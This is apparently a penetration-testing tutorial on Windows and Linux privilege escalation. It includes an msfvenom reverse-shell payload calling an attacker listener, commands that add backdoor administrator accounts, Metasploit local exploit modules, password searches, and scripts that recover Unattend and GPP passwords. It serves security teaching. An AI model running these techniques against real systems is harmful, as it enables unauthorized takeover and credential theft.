✅ 17 techniques for Privilege Escalation in Windows and Linux

Learn several methods for privilege escalation

Windows Privilege Escalation Methods

Method #1: Metasploit getsystem (From local admin to SYSTEM)

To escalate privileges from local administrator to SYSTEM with Meterpreter (older versions need the priv extension loaded first; current ones load it automatically):

meterpreter> use priv
meterpreter> getsystem

getsystem tries its techniques in order until one succeeds: the first two use named-pipe impersonation (an in-memory and a dropper variant) and the third uses token duplication. All of them need an already elevated session: the named-pipe techniques rely on SeImpersonatePrivilege, token duplication on SeDebugPrivilege. Run "getsystem -h" to list the techniques and "getuid" afterwards to confirm you are NT AUTHORITY\SYSTEM.


Method #2: Unquoted Service Paths

It happens when a developer fails to enclose the file path of a service binary in quotes and that path contains spaces. When the Service Control Manager starts the service, CreateProcess has to guess where the executable name ends, so it tries each space-delimited prefix in turn (appending .exe) before reaching the intended binary. A properly quoted path is unambiguous and is not affected.

Given this unquoted ImagePath:

C:\Program Files\Some Folder\Config files\Service.exe

Windows would try to execute, in order:

C:\Program.exe
C:\Program Files\Some.exe
C:\Program Files\Some Folder\Config.exe
C:\Program Files\Some Folder\Config files\Service.exe

So if we have write access to one of the intermediate directories we can drop a binary with the right name there:

icacls "C:\Program Files\Some Folder"

Search for an entry like BUILTIN\Users:(OI)(CI)(M) (or (W) or (F))

(M) stands for Modify, (W) for Write and (F) for Full control; any of them on the directory granted to BUILTIN\Users or Authenticated Users means unprivileged users can create files there. (OI) and (CI) mean the permission is inherited by files and subdirectories.

Use the below command for more info related to the icacls command:

icacls /?

To see which account each service runs as (we want LocalSystem):

wmic service get name,startname

Then build a payload named after one of the candidate executables (here Config.exe, which matches the Config.exe candidate above) with msfvenom. Use the exe-service format rather than a plain exe: the Service Control Manager kills a binary that does not register with it within about 30 seconds, which would take a plain-exe payload and its session down with it. $IP is your listener address:

msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai LHOST=$IP LPORT=443 -f exe-service -o Config.exe

And copy it to the folder we can write in (quote the path, it contains spaces):

copy Config.exe "C:\Program Files\Some Folder\"

Then either wait for the machine to be rebooted, or reboot it yourself if you hold SeShutdownPrivilege:

shutdown /r /t 0

From a Metasploit session, the local exploit module automates the whole chain (path enumeration, payload drop and service restart):

msf> use exploit/windows/local/trusted_service_path

To find candidates manually, list auto-start services and drop those living under C:\Windows and those whose path is already quoted:

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

Then restart the affected service so the SCM walks the unquoted path again (this needs the right to stop and start that particular service; otherwise wait for a reboot):

sc stop $SERVICENAME & sc start $SERVICENAME
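The whole Method #2 triage (which paths Windows tries, which of their directories we can write to, which auto-start services outside C:\Windows are affected) as a script. This is an added example, not code from the original post: the service names, paths and the demo_writable predicate are made up for it; on a real target replace the predicate with os.access (the default) or the icacls check above.

```python
#!/usr/bin/env python3
"""Unquoted service path triage (added example, not code from the original post).

Given a service ImagePath as shown by `sc qc <name>` or
`wmic service get name,pathname,startmode,startname`, compute the executables
Windows will try before the intended one, then keep those whose directory is
writable according to a caller-supplied predicate (os.access by default, so
the same function works when run on the target itself).
"""
import os
from typing import Callable, List, Tuple


def hijack_candidates(image_path: str) -> List[str]:
    """Return, in order, the paths CreateProcess will try (with .exe appended)
    before reaching the real binary of an unquoted ImagePath. A quoted path
    is unambiguous and yields no candidates."""
    p = image_path.strip()
    if p.startswith('"'):
        return []
    tokens = p.split(" ")
    candidates = []
    for i in range(1, len(tokens)):
        prefix = " ".join(tokens[:i])
        if prefix.lower().endswith(".exe"):
            break  # reached the real executable; the rest are arguments
        candidates.append(prefix + ".exe")
    return candidates


def writable_candidates(image_path: str,
                        is_writable: Callable[[str], bool] = lambda d: os.access(d, os.W_OK)) -> List[str]:
    """Keep only candidates whose parent directory the current user can write to."""
    hits = []
    for cand in hijack_candidates(image_path):
        parent = cand.rsplit("\\", 1)[0]
        if is_writable(parent):
            hits.append(cand)
    return hits


def triage(services: List[Tuple[str, str, str, str]],
           is_writable: Callable[[str], bool] = lambda d: os.access(d, os.W_OK)):
    """Same filter as the wmic|findstr one-liner: auto-start, outside C:\\Windows,
    unquoted. Each entry is (name, pathname, startmode, startname).
    Returns (name, account, [writable candidate paths]) for exploitable ones."""
    findings = []
    for name, path, start_mode, run_as in services:
        if start_mode.lower() != "auto":
            continue
        if path.lower().startswith("c:\\windows\\"):
            continue
        hits = writable_candidates(path, is_writable)
        if hits:
            findings.append((name, run_as, hits))
    return findings


# Constructed sample services (names and paths are made up for this example).
SAMPLE_SERVICES = [
    ("EventLog", r"C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted", "Auto", "NT AUTHORITY\\LocalService"),
    ("SomeSvc", r"C:\Program Files\Some Folder\Config files\Service.exe", "Auto", "LocalSystem"),
    ("QuotedSvc", r'"C:\Program Files\Other App\bin\svc.exe" -config "x y.ini"', "Auto", "LocalSystem"),
    ("ManualSvc", r"C:\Program Files\Some Folder\Other\tool.exe", "Manual", "LocalSystem"),
]


def demo_writable(directory: str) -> bool:
    """Stand-in for icacls/os.access: pretend only 'Some Folder' is user-writable."""
    return directory.lower() == r"c:\program files\some folder"


if __name__ == "__main__":
    for name, account, hits in triage(SAMPLE_SERVICES, demo_writable):
        print(f"{name} runs as {account}; drop a binary at: {', '.join(hits)}")
```

Note that the first candidate, C:\Program.exe, is almost never exploitable because the root of the system drive is not writable by standard users; the interesting ones are directories created by third-party installers with loose ACLs.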

Method #3: Tokens

If the account you land in holds one of the following privileges (listed by whoami /priv), its access tokens can be abused to run code as SYSTEM; service accounts such as IIS application pools and SQL Server typically have them:

  • SeImpersonatePrivilege

  • SeAssignPrimaryTokenPrivilege

Reference: https://foxglovesecurity.com/2017/08/25/abusing-token-privileges-for-windows-local-privilege-escalation/

Method #4: Hardcoded credentials

As easy as looking for plaintext passwords left on the system (in txt files, backup files, SQL dumps, config files, ...). Search both the filesystem and the registry:

dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si password *.xml *.ini *.txt
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Method #5: Sensitive files on Desktop, Documents (xls, txt, ...)

See the post "The Art of Pentesting: Post-exploitation like an APT" on this blog for commands to search for sensitive files and information; its Linux post-exploitation checks are the same find commands used in the Linux section below.

Method #6: DLL injection / hijacking

A program that loads a DLL by name rather than by absolute path walks the DLL search order; if the DLL is missing, or a directory searched earlier than the legitimate one is writable by us, our DLL is loaded with the privileges of that program or service. Trusted directories to inject on:




Method #7: Unattended installation files (Unattend.xml)

  • Answer files from unattended installs that were not cleaned up properly can be abused: they may still hold local account and auto-logon passwords, base64-encoded rather than encrypted.

  • Look mainly in these directories:

dir C:\Windows\Panther\

dir C:\Windows\Panther\Unattend\

dir C:\Windows\System32\

dir C:\Windows\System32\sysprep\

In addition to Unattend.xml files, be on the lookout for sysprep.xml and sysprep.inf

Using metasploit:

msf> use post/windows/gather/enum_unattend
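What enum_unattend does, spelled out: an added example (not code from the original post or from Metasploit) that parses an answer file and recovers the passwords. When PlainText is false the Value is base64 of the UTF-16LE password with the element name appended ("Password" for AutoLogon and LocalAccount entries, "AdministratorPassword" for that element), which is encoding, not encryption. The answer file below is constructed for this example; the account names and passwords in it are invented.

```python
#!/usr/bin/env python3
"""Pull credentials out of an Unattend.xml / sysprep answer file.

Added example, not code from the original post. The <PlainText> flag decides
whether <Value> is the password itself or base64(UTF-16LE(password + element
name)); both cases are handled. SAMPLE_UNATTEND is constructed here.
"""
import base64
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

PASSWORD_ELEMENTS = ("Password", "AdministratorPassword")


def encode_password(plain: str, element: str) -> str:
    """How the answer-file value is produced (used here to build the sample)."""
    return base64.b64encode((plain + element).encode("utf-16-le")).decode("ascii")


def decode_password(value: str, element: str) -> str:
    """Reverse of encode_password; tolerates values that lack the suffix."""
    text = base64.b64decode(value.strip()).decode("utf-16-le")
    return text[:-len(element)] if text.endswith(element) else text


def _local(tag: str) -> str:
    """Strip the XML namespace prefix ElementTree puts on every tag."""
    return tag.rsplit("}", 1)[-1]


def _child_text(el: ET.Element, name: str) -> Optional[str]:
    for child in el:
        if _local(child.tag) == name:
            return (child.text or "").strip()
    return None


def extract_passwords(xml_text: str) -> List[Dict[str, str]]:
    """One record per password element: where it was, which account, the plaintext."""
    root = ET.fromstring(xml_text)
    parents = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for el in root.iter():
        tag = _local(el.tag)
        if tag not in PASSWORD_ELEMENTS:
            continue
        value = _child_text(el, "Value")
        if not value:
            continue
        # PlainText defaults to true when absent; only "false" means base64-encoded.
        encoded = (_child_text(el, "PlainText") or "true").lower() == "false"
        try:
            password = decode_password(value, tag) if encoded else value
        except (ValueError, UnicodeDecodeError):
            password = f"<undecodable: {value}>"
        parent = parents.get(el)
        ptag = _local(parent.tag) if parent is not None else ""
        if tag == "AdministratorPassword":
            user = "Administrator"
        elif ptag == "AutoLogon":
            user = _child_text(parent, "Username") or "?"
        elif ptag == "LocalAccount":
            user = _child_text(parent, "Name") or "?"
        else:
            user = "?"
        findings.append({"context": ptag or tag, "user": user, "password": password})
    return findings


# Constructed sample answer file (not taken from a real system).
SAMPLE_UNATTEND = f"""<unattend xmlns="urn:schemas-microsoft-com:unattend"
          xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password>
          <Value>{encode_password("Autumn2024!", "Password")}</Value>
          <PlainText>false</PlainText>
        </Password>
        <Enabled>true</Enabled>
        <Username>svc_deploy</Username>
      </AutoLogon>
      <UserAccounts>
        <AdministratorPassword>
          <Value>{encode_password("Sup3rS3cret", "AdministratorPassword")}</Value>
          <PlainText>false</PlainText>
        </AdministratorPassword>
        <LocalAccounts>
          <LocalAccount wcm:action="add">
            <Password>
              <Value>deploy123</Value>
              <PlainText>true</PlainText>
            </Password>
            <Name>deploy</Name>
            <Group>Administrators</Group>
          </LocalAccount>
        </LocalAccounts>
      </UserAccounts>
    </component>
  </settings>
</unattend>
"""

if __name__ == "__main__":
    for hit in extract_passwords(SAMPLE_UNATTEND):
        print(f"{hit['context']:>14}  {hit['user']:<14} {hit['password']}")
```

Run it against the files found in the Panther and sysprep directories above (read them with open(path, encoding="utf-8-sig") first, since many are saved with a BOM); the same element names appear in sysprep.xml.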

Method #8: GPP cracking

Group Policy Preferences (GPP) let you control computers in a number of ways. Think of them as unmanaged settings for your computers and users. They can also be used to create accounts and set passwords across the domain (for example, the same local Administrator password on every workstation).

The policy files that can carry such passwords (Groups.xml, but also Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml and Printers.xml) store them in a cpassword attribute, "encrypted" with an AES key that Microsoft itself published, so anyone can decrypt them. They live in a share on the domain controllers that every authenticated domain user can read. MS14-025 (2014) removed the ability to set new passwords this way, but it did not delete files created earlier, so they are still found in the wild.

net use z: \\$IP\SYSVOL

SYSVOL is simply a folder which resides on each and every domain controller within the domain. It contains the domain's public files that need to be accessed by clients and kept synchronised between domain controllers. The default location for the SYSVOL is C:\Windows\SYSVOL, although it can be moved to another location during the promotion of a domain controller. It is possible but not recommended to relocate the SYSVOL after DC promotion as there is potential for error. The SYSVOL folder can be accessed through its domain share \\domainname.com\sysvol or the local share name on the server \\servername\sysvol.

SYSVOL is the domain-wide share in Active Directory to which all authenticated users have read access.

By default there are two folders with a GUID name under C:\Windows\SYSVOL\domain\policies, representing two group policies (GPOs). In any new domain environment we always get two default GPOs, the Default Domain Policy and the Default Domain Controllers Policy.

To update your GPOs:


To list the GPOs applied to the current user and machine, then search for Groups.xml:

gpresult /R
dir /s Groups.xml

Another, more direct attack vector: search the whole policies tree for cpassword attributes:

findstr /S /I cpassword \\$FQDN\sysvol\$FQDN\policies\*.xml

Once we have the encrypted value (the cpassword attribute; it is base64 without padding, not a hash):

In Linux (gpp-decrypt ships with Kali):

gpp-decrypt $AES_PASSWORD

In Windows, use the PowerSploit function Get-GPPPassword, which searches SYSVOL and decrypts every cpassword it finds; its helper decrypts a single value:

Get-DecryptedCpassword $AES_PASSWORD
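The findstr one-liner above tells you a file contains cpassword but not which preference type or account it belongs to. Here is an added example (not code from the original post, PowerSploit or gpp-decrypt) that walks a SYSVOL tree, reports every cpassword with the account it applies to, and restores the base64 padding the attribute drops. The SYSVOL layout, GUID folder and cpassword strings it builds are constructed for the example and do not decrypt to anything; decryption is implemented for when the `cryptography` package is installed, otherwise hand the values to gpp-decrypt.

```python
#!/usr/bin/env python3
"""Locate Group Policy Preference cpassword values under SYSVOL.

Added example, not code from the original post. Every preference item that
carries a password stores it in a `cpassword` attribute: AES-256-CBC with the
key Microsoft published, zero IV, PKCS7 padding, base64 without '=' padding.
The sample tree built by build_sample_sysvol() is constructed.
"""
import base64
import os
import tempfile
import xml.etree.ElementTree as ET
from typing import Dict, List

# Published in Microsoft's GPP documentation (MS14-025 stopped new use of it).
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")

# Attribute holding the account name, depending on the preference type.
ACCOUNT_ATTRS = ("userName", "username", "accountName", "runAs")


def pad_b64(cpassword: str) -> str:
    """cpassword omits base64 '=' padding; restore it so b64decode accepts it."""
    return cpassword + "=" * (-len(cpassword) % 4)


def find_cpasswords(sysvol_root: str) -> List[Dict[str, str]]:
    """Walk a SYSVOL tree and return every element with a non-empty cpassword."""
    findings = []
    for dirpath, _, files in os.walk(sysvol_root):
        for fn in files:
            if not fn.lower().endswith(".xml"):
                continue
            path = os.path.join(dirpath, fn)
            try:
                tree = ET.parse(path)
            except ET.ParseError:
                continue
            for el in tree.iter():
                cp = el.get("cpassword")
                if not cp:
                    continue
                account = next((el.get(a) for a in ACCOUNT_ATTRS if el.get(a)), "?")
                findings.append({"file": path, "type": fn, "account": account, "cpassword": cp})
    return findings


def decrypt_cpassword(cpassword: str) -> str:
    """AES-256-CBC, zero IV, PKCS7, UTF-16LE plaintext (needs the `cryptography` package)."""
    from cryptography.hazmat.primitives import padding
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    data = base64.b64decode(pad_b64(cpassword))
    dec = Cipher(algorithms.AES(GPP_AES_KEY), modes.CBC(b"\x00" * 16)).decryptor()
    unpadder = padding.PKCS7(128).unpadder()
    plain = unpadder.update(dec.update(data) + dec.finalize()) + unpadder.finalize()
    return plain.decode("utf-16-le")


def build_sample_sysvol() -> str:
    """Create a scratch SYSVOL-like tree with two constructed preference files."""
    root = tempfile.mkdtemp(prefix="sysvol_")
    # Constructed 32-byte blob, base64 with padding stripped: NOT a real ciphertext.
    fake_cp = base64.b64encode(bytes(range(1, 33))).decode("ascii").rstrip("=")
    gpo = os.path.join(root, "Policies", "{31B2F340-016D-11D2-945F-00C04FB984F9}", "Machine", "Preferences")
    groups = os.path.join(gpo, "Groups")
    os.makedirs(groups)
    with open(os.path.join(groups, "Groups.xml"), "w") as f:
        f.write(f'''<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="LocalAdmin" changed="2014-01-01 00:00:00">
    <Properties action="U" newName="" fullName="" description="" cpassword="{fake_cp}"
                changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="LocalAdmin"/>
  </User>
</Groups>''')
    tasks = os.path.join(gpo, "ScheduledTasks")
    os.makedirs(tasks)
    with open(os.path.join(tasks, "ScheduledTasks.xml"), "w") as f:
        f.write(f'''<ScheduledTasks>
  <Task name="Backup">
    <Properties action="C" runAs="CORP\\svc_backup" cpassword="{fake_cp}" appName="backup.exe"/>
  </Task>
  <Task name="NoCreds"><Properties action="C" runAs="" cpassword="" appName="x.exe"/></Task>
</ScheduledTasks>''')
    return root


if __name__ == "__main__":
    for hit in find_cpasswords(build_sample_sysvol()):
        print(f"{hit['type']:<20} {hit['account']:<18} {hit['cpassword']}")
```

Point find_cpasswords at the mapped drive (z:\ after the net use above, or \\$FQDN\sysvol\$FQDN\policies); a Groups.xml entry with action="U" and a cpassword is the classic domain-wide local Administrator password.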


Method #9: Weak services and bad permissions

Use AccessChk from Sysinternals (the /accepteula switch avoids the licence dialog on a first run).

Which services can be modified by any authenticated user (regardless of privilege level); -w asks for write access, -c for service objects:

accesschk.exe -uwcqv "Authenticated Users" * /accepteula

List service parameters:

accesschk.exe -ucqv $SERVICENAME

Find all weak folder permissions per drive:

accesschk.exe -uwdqs Users c:\

accesschk.exe -uwdqs "Authenticated Users" c:\

Find all weak file permissions per drive:

accesschk.exe -uwqs Users c:\*.*

accesschk.exe -uwqs "Authenticated Users" c:\*.*

Permissions on a specific folder:

accesschk.exe Builtin\Users c:\inetpub

Look at the configuration of a service we can modify:

sc qc $SERVICE

If we can change its binPath, point it at a command of our choice (the space after binpath= is mandatory). This is only an example: net.exe is not a service binary, so sc start reports a timeout, but the command has already run as the service account by then. Repeat the same three steps with binpath= set to net localgroup administrators alien /add to make the new user a local administrator.

sc config $SERVICE binpath= "net user alien alien /add"

sc stop $SERVICE

sc start $SERVICE

From Metasploit (local exploit module, run from an existing session):

msf> use exploit/windows/local/service_permissions

Method #10: AlwaysInstallElevated ON

When this policy is enabled in both HKLM and HKCU (value 1), Windows Installer runs any MSI package with SYSTEM privileges, so any user can install a malicious MSI.

Manual method (both queries must return 0x1, otherwise the policy does not apply):

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Using msfvenom to build an MSI that creates a local administrator (user name and password below are examples):

msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o rotten.msi

msiexec /quiet /qn /i C:\Users\$USER\Downloads\rotten.msi

Another method with Metasploit, from an existing session:
If the machine has the AlwaysInstallElevated registry flag on, then just:

msf> use exploit/windows/local/always_install_elevated

Method #11: Abusing scheduled tasks

List every task with the account it runs as and the command it executes, and look for tasks running as SYSTEM or an administrator whose binary or script lives somewhere we can write to (the second command maps running processes to the services they host):

schtasks /query /fo LIST /v
tasklist /SVC

Method #12: Local exploits

Kernel and third-party local exploits, matched against the patch level reported by systeminfo (Metasploit's local_exploit_suggester post module automates the matching against an existing session):

msf> use exploit/windows/local/*


Linux Privilege Escalation Methods

Most common techniques for privilege escalation in Linux environments:

Method #1: Find setuids

A setuid binary runs with the privileges of its owner, so a root-owned one that can be coerced into spawning a shell or writing a file is a direct path to root. Sometimes in CTFs there are trojans hidden in the system with the setuid bit set; list all of them with find and look at anything that is not a standard system binary:

find / -perm -4000 -ls 2> /dev/null

Method #2: Find world writable directories

Test the other-write bit alone: -perm -777 only matches directories that have every permission bit set and misses, for example, a 775-with-o+w directory. Note that the sticky bit (as on /tmp) stops you deleting other users' files but not adding new ones:

find / -perm -o=w -type d -ls 2> /dev/null

Method #3: Find world readable logs or backups

Linux defaults are usually restrictive, BUT sysadmins often do not protect system backups properly, so you can extract sensitive files such as /etc/shadow from them. Looking for gz, tar or zip files is definitely worth it:

find / \( -name "*.gz" -o -name "*.tar" -o -name "*.zip" \) 2> /dev/null

Method #4: Check crontab tasks

Scheduled tasks may contain misconfigurations, for example a script that runs as root but is writable by everybody (or lives in a directory that is), in which case you can replace it and wait for the next run. crontab -l shows only your own jobs; the system-wide ones are in /etc/crontab and /etc/cron*:

crontab -l
ls -lR /etc/cron*
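The check described above, automated: an added example (not code from the original post) that parses /etc/crontab-style lines, pulls the absolute paths out of each root job and flags scripts that are world-writable or that are missing from (or sit in) a world-writable directory without the sticky bit, since either lets a low-privileged user replace what root will execute. The crontab text and script files it builds in a temporary directory are constructed for the example; on a target, feed it the contents of /etc/crontab and /etc/cron.d/*.

```python
#!/usr/bin/env python3
"""Audit system crontab entries for scripts a low-privileged user can modify.

Added example, not code from the original post. Handles the system format
(schedule, user, command) used by /etc/crontab and /etc/cron.d/*; user
crontabs from `crontab -l` have no user field and are not parsed here.
"""
import os
import re
import stat
import tempfile
from typing import Dict, List, Optional, Tuple

PATH_RE = re.compile(r"(/[^\s;|&<>()'\"]+)")


def parse_system_crontab(text: str) -> List[Tuple[str, str, str]]:
    """Return (schedule, user, command) for each job line."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue  # comment or environment assignment such as PATH=...
        if line.startswith("@"):
            parts = line.split(None, 2)  # @reboot user command
        else:
            parts = line.split(None, 6)  # m h dom mon dow user command
            parts = [" ".join(parts[:5])] + parts[5:]
        if len(parts) == 3:
            entries.append((parts[0], parts[1], parts[2]))
    return entries


def weakness(path: str) -> Optional[str]:
    """Reason a non-owner could change what runs at `path`, or None."""
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        st = None
    if st is not None:
        if not stat.S_ISREG(st.st_mode):
            return None  # devices, directories, symlinks: out of scope here
        if st.st_mode & stat.S_IWOTH:
            return "world-writable file"
    parent = os.path.dirname(path) or "/"
    try:
        pst = os.stat(parent)
    except FileNotFoundError:
        return None
    if pst.st_mode & stat.S_IWOTH and not pst.st_mode & stat.S_ISVTX:
        return ("missing file in world-writable directory" if st is None
                else "file in world-writable directory (no sticky bit)")
    return None


def audit_crontab(text: str, only_user: str = "root") -> List[Dict[str, str]]:
    """Flag every absolute path in jobs run as `only_user` that weakness() dislikes."""
    findings = []
    for schedule, user, command in parse_system_crontab(text):
        if only_user and user != only_user:
            continue
        for path in PATH_RE.findall(command):
            reason = weakness(path)
            if reason:
                findings.append({"schedule": schedule, "user": user, "path": path, "reason": reason})
    return findings


def build_sample() -> str:
    """Construct a scratch layout: a 777 script, a 755 script, a 777 directory, and a crontab using them."""
    base = tempfile.mkdtemp(prefix="cronaudit_")
    os.chmod(base, 0o755)
    weak, safe = os.path.join(base, "backup.sh"), os.path.join(base, "rotate.sh")
    for p in (weak, safe):
        with open(p, "w") as f:
            f.write("#!/bin/sh\necho job\n")
    os.chmod(weak, 0o777)
    os.chmod(safe, 0o755)
    dropdir = os.path.join(base, "drop")
    os.mkdir(dropdir)
    os.chmod(dropdir, 0o777)
    return f"""# constructed /etc/crontab for this example
SHELL=/bin/sh
PATH=/usr/sbin:/usr/bin:/sbin:/bin
*/5 * * * * root {weak} --full > /dev/null 2>&1
0 3 * * * root {safe}
@reboot root {dropdir}/start.sh
15 * * * * backup {weak}
"""


if __name__ == "__main__":
    for hit in audit_crontab(build_sample()):
        print(f"{hit['schedule']:<12} {hit['user']:<6} {hit['path']}: {hit['reason']}")
```

The /dev/null redirect in the first job is deliberately not reported (it is a device, not a script), and the last job is skipped because it runs as a non-root user; drop only_user to audit every account.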

Method #5: Local exploits for kernel or applications

As part of your local enumeration, record the kernel version, the installed applications and the running daemons, and match them against known exploits for outdated versions.






